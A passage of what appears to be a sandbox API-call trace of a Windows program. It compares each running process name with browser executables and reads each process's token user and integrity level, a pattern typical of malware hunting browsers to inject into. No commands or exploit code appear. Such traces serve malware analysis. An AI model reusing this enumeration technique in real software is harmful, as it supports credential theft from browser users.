lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0231.144] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0231.144] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0231.144] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0231.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xb4 [0231.145] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.145] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.145] GetLastError () returned 0x7a [0231.145] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.145] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.145] CloseHandle (hObject=0xb8) returned 1 [0231.145] CloseHandle (hObject=0xb4) returned 1 [0231.145] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.145] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.146] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.146] GetLastError () returned 0x7a [0231.146] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.146] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.146] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.146] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0231.146] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0231.146] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0231.146] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0231.146] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0231.147] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0231.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xb4 [0231.147] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.147] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.147] GetLastError () returned 0x7a [0231.147] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.147] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.147] CloseHandle (hObject=0xb8) returned 1 [0231.147] CloseHandle (hObject=0xb4) returned 1 [0231.147] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.148] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.148] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.148] GetLastError () returned 0x7a [0231.148] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.148] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.148] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.148] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0231.149] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0231.149] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0231.149] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0231.149] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0231.149] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0231.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xb4 [0231.149] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.149] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.150] GetLastError () returned 0x7a [0231.150] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.150] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.150] CloseHandle (hObject=0xb8) returned 1 [0231.150] CloseHandle (hObject=0xb4) returned 1 [0231.150] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.151] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.151] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.151] GetLastError () returned 0x7a [0231.151] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.151] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.151] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.152] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0231.152] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0231.152] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0231.152] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0231.152] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0231.152] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0231.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xb4 [0231.152] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.152] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.152] GetLastError () returned 0x7a [0231.152] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.153] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.153] CloseHandle (hObject=0xb8) returned 1 [0231.153] CloseHandle (hObject=0xb4) returned 1 [0231.153] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.153] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.153] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.153] GetLastError () returned 0x7a [0231.153] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.154] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.154] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.154] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0231.154] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0231.154] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0231.154] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0231.155] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0231.155] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0231.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xb4 [0231.155] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.155] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.155] GetLastError () returned 0x7a [0231.155] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.155] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.155] CloseHandle (hObject=0xb8) returned 1 [0231.156] CloseHandle (hObject=0xb4) returned 1 [0231.156] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.156] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.156] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.156] GetLastError () returned 0x7a [0231.156] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.157] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.157] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.157] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0231.157] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0231.157] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0231.157] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0231.157] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0231.157] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0231.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xb4 [0231.157] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.157] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.158] GetLastError () returned 0x7a [0231.158] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.158] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.158] CloseHandle (hObject=0xb8) returned 1 [0231.158] CloseHandle (hObject=0xb4) returned 1 [0231.158] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.158] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.158] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.159] GetLastError () returned 0x7a [0231.159] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.159] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.159] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.159] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0231.159] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0231.159] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0231.159] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0231.159] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0231.159] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0231.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xb4 [0231.159] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.160] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.160] GetLastError () returned 0x7a [0231.160] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.160] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.160] CloseHandle (hObject=0xb8) returned 1 [0231.160] CloseHandle (hObject=0xb4) returned 1 [0231.160] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.160] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.160] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.161] GetLastError () returned 0x7a [0231.161] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.161] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.161] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.161] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0231.161] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0231.161] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0231.161] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0231.161] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0231.161] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0231.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xb4 [0231.161] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.162] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.162] GetLastError () returned 0x7a [0231.162] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.162] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.162] CloseHandle (hObject=0xb8) returned 1 [0231.162] CloseHandle (hObject=0xb4) returned 1 [0231.162] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.162] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.162] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.162] GetLastError () returned 0x7a [0231.162] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.162] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.163] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.163] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0231.163] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0231.163] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0231.163] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0231.163] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0231.163] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0231.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xb4 [0231.163] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.163] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.163] GetLastError () returned 0x7a [0231.163] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.163] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.163] CloseHandle (hObject=0xb8) returned 1 [0231.163] CloseHandle (hObject=0xb4) returned 1 [0231.163] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.163] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.164] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.164] GetLastError () returned 0x7a [0231.164] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.164] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.164] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 